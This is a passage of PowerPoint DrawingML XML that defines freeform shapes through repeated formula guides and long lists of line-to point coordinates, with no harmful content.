                  <a:gd name="T93" fmla="*/ 0 h 1034"/>
                  <a:gd name="T94" fmla="*/ 0 w 1616"/>
                  <a:gd name="T95" fmla="*/ 0 h 1034"/>
                  <a:gd name="T96" fmla="*/ 0 w 1616"/>
                  <a:gd name="T97" fmla="*/ 0 h 1034"/>
                  <a:gd name="T98" fmla="*/ 0 w 1616"/>
                  <a:gd name="T99" fmla="*/ 0 h 1034"/>
                  <a:gd name="T100" fmla="*/ 0 w 1616"/>
                  <a:gd name="T101" fmla="*/ 0 h 1034"/>
                  <a:gd name="T102" fmla="*/ 0 w 1616"/>
                  <a:gd name="T103" fmla="*/ 0 h 1034"/>
                  <a:gd name="T104" fmla="*/ 0 w 1616"/>
                  <a:gd name="T105" fmla="*/ 0 h 1034"/>
                  <a:gd name="T106" fmla="*/ 0 w 1616"/>
                  <a:gd name="T107" fmla="*/ 0 h 1034"/>
                  <a:gd name="T108" fmla="*/ 0 w 1616"/>
                  <a:gd name="T109" fmla="*/ 0 h 10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16"/>
                  <a:gd name="T166" fmla="*/ 0 h 1034"/>
                  <a:gd name="T167" fmla="*/ 1616 w 1616"/>
                  <a:gd name="T168" fmla="*/ 1034 h 10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16" h="1034">
                    <a:moveTo>
                      <a:pt x="499" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1363" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1397" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1570" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1593" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1589" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1322" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1038" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="13"/>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3087" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="413" y="2414"/>
                <a:ext cx="161" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 491"/>
                  <a:gd name="T1" fmla="*/ 0 h 151"/>
                  <a:gd name="T2" fmla="*/ 0 w 491"/>
                  <a:gd name="T3" fmla="*/ 0 h 151"/>
                  <a:gd name="T4" fmla="*/ 0 w 491"/>
                  <a:gd name="T5" fmla="*/ 0 h 151"/>
                  <a:gd name="T6" fmla="*/ 0 w 491"/>
                  <a:gd name="T7" fmla="*/ 0 h 151"/>
                  <a:gd name="T8" fmla="*/ 0 w 491"/>
                  <a:gd name="T9" fmla="*/ 0 h 151"/>
                  <a:gd name="T10" fmla="*/ 0 w 491"/>
                  <a:gd name="T11" fmla="*/ 0 h 151"/>
                  <a:gd name="T12" fmla="*/ 0 w 491"/>
                  <a:gd name="T13" fmla="*/ 0 h 151"/>
                  <a:gd name="T14" fmla="*/ 0 w 491"/>
                  <a:gd name="T15" fmla="*/ 0 h 151"/>
                  <a:gd name="T16" fmla="*/ 0 w 491"/>
                  <a:gd name="T17" fmla="*/ 0 h 151"/>
                  <a:gd name="T18" fmla="*/ 0 w 491"/>
                  <a:gd name="T19" fmla="*/ 0 h 151"/>
                  <a:gd name="T20" fmla="*/ 0 w 491"/>
                  <a:gd name="T21" fmla="*/ 0 h 151"/>
                  <a:gd name="T22" fmla="*/ 0 w 491"/>
                  <a:gd name="T23" fmla="*/ 0 h 151"/>
                  <a:gd name="T24" fmla="*/ 0 w 491"/>
                  <a:gd name="T25" fmla="*/ 0 h 151"/>
                  <a:gd name="T26" fmla="*/ 0 w 491"/>
                  <a:gd name="T27" fmla="*/ 0 h 151"/>
                  <a:gd name="T28" fmla="*/ 0 w 491"/>
                  <a:gd name="T29" fmla="*/ 0 h 151"/>
                  <a:gd name="T30" fmla="*/ 0 w 491"/>
                  <a:gd name="T31" fmla="*/ 0 h 151"/>
                  <a:gd name="T32" fmla="*/ 0 w 491"/>
                  <a:gd name="T33" fmla="*/ 0 h 151"/>
                  <a:gd name="T34" fmla="*/ 0 w 491"/>
                  <a:gd name="T35" fmla="*/ 0 h 151"/>
                  <a:gd name="T36" fmla="*/ 0 w 491"/>
                  <a:gd name="T37" fmla="*/ 0 h 151"/>
                  <a:gd name="T38" fmla="*/ 0 w 491"/>
                  <a:gd name="T39" fmla="*/ 0 h 151"/>
                  <a:gd name="T40" fmla="*/ 0 w 491"/>
                  <a:gd name="T41" fmla="*/ 0 h 151"/>
                  <a:gd name="T42" fmla="*/ 0 w 491"/>
                  <a:gd name="T43" fmla="*/ 0 h 151"/>
                  <a:gd name="T44" fmla="*/ 0 w 491"/>
                  <a:gd name="T45" fmla="*/ 0 h 151"/>
                  <a:gd name="T46" fmla="*/ 0 w 491"/>
                  <a:gd name="T47" fmla="*/ 0 h 151"/>
                  <a:gd name="T48" fmla="*/ 0 w 491"/>
                  <a:gd name="T49" fmla="*/ 0 h 151"/>
                  <a:gd name="T50" fmla="*/ 0 w 491"/>
                  <a:gd name="T51" fmla="*/ 0 h 151"/>
                  <a:gd name="T52" fmla="*/ 0 w 491"/>
                  <a:gd name="T53" fmla="*/ 0 h 151"/>
                  <a:gd name="T54" fmla="*/ 0 w 491"/>
                  <a:gd name="T55" fmla="*/ 0 h 151"/>
                  <a:gd name="T56" fmla="*/ 0 w 491"/>
                  <a:gd name="T57" fmla="*/ 0 h 151"/>
                  <a:gd name="T58" fmla="*/ 0 w 491"/>
                  <a:gd name="T59" fmla="*/ 0 h 151"/>
                  <a:gd name="T60" fmla="*/ 0 w 491"/>
                  <a:gd name="T61" fmla="*/ 0 h 151"/>
                  <a:gd name="T62" fmla="*/ 0 w 491"/>
                  <a:gd name="T63" fmla="*/ 0 h 151"/>
                  <a:gd name="T64" fmla="*/ 0 w 491"/>
                  <a:gd name="T65" fmla="*/ 0 h 151"/>
                  <a:gd name="T66" fmla="*/ 0 w 491"/>
                  <a:gd name="T67" fmla="*/ 0 h 151"/>
                  <a:gd name="T68" fmla="*/ 0 w 491"/>
                  <a:gd name="T69" fmla="*/ 0 h 151"/>
                  <a:gd name="T70" fmla="*/ 0 w 491"/>
                  <a:gd name="T71" fmla="*/ 0 h 151"/>
                  <a:gd name="T72" fmla="*/ 0 w 491"/>
                  <a:gd name="T73" fmla="*/ 0 h 151"/>
                  <a:gd name="T74" fmla="*/ 0 w 491"/>
                  <a:gd name="T75" fmla="*/ 0 h 151"/>
                  <a:gd name="T76" fmla="*/ 0 w 491"/>
                  <a:gd name="T77" fmla="*/ 0 h 151"/>
                  <a:gd name="T78" fmla="*/ 0 w 491"/>
                  <a:gd name="T79" fmla="*/ 0 h 151"/>
                  <a:gd name="T80" fmla="*/ 0 w 491"/>
                  <a:gd name="T81" fmla="*/ 0 h 151"/>
                  <a:gd name="T82" fmla="*/ 0 w 491"/>
                  <a:gd name="T83" fmla="*/ 0 h 151"/>
                  <a:gd name="T84" fmla="*/ 0 w 491"/>
                  <a:gd name="T85" fmla="*/ 0 h 151"/>
                  <a:gd name="T86" fmla="*/ 0 w 491"/>
                  <a:gd name="T87" fmla="*/ 0 h 151"/>
                  <a:gd name="T88" fmla="*/ 0 w 491"/>
                  <a:gd name="T89" fmla="*/ 0 h 151"/>
                  <a:gd name="T90" fmla="*/ 0 w 491"/>
                  <a:gd name="T91" fmla="*/ 0 h 151"/>
                  <a:gd name="T92" fmla="*/ 0 w 491"/>
                  <a:gd name="T93" fmla="*/ 0 h 151"/>
                  <a:gd name="T94" fmla="*/ 0 w 491"/>
                  <a:gd name="T95" fmla="*/ 0 h 151"/>
                  <a:gd name="T96" fmla="*/ 0 w 491"/>
                  <a:gd name="T97" fmla="*/ 0 h 151"/>
                  <a:gd name="T98" fmla="*/ 0 w 491"/>
                  <a:gd name="T99" fmla="*/ 0 h 151"/>
                  <a:gd name="T100" fmla="*/ 0 w 491"/>
                  <a:gd name="T101" fmla="*/ 0 h 151"/>
                  <a:gd name="T102" fmla="*/ 0 w 491"/>
                  <a:gd name="T103" fmla="*/ 0 h 151"/>
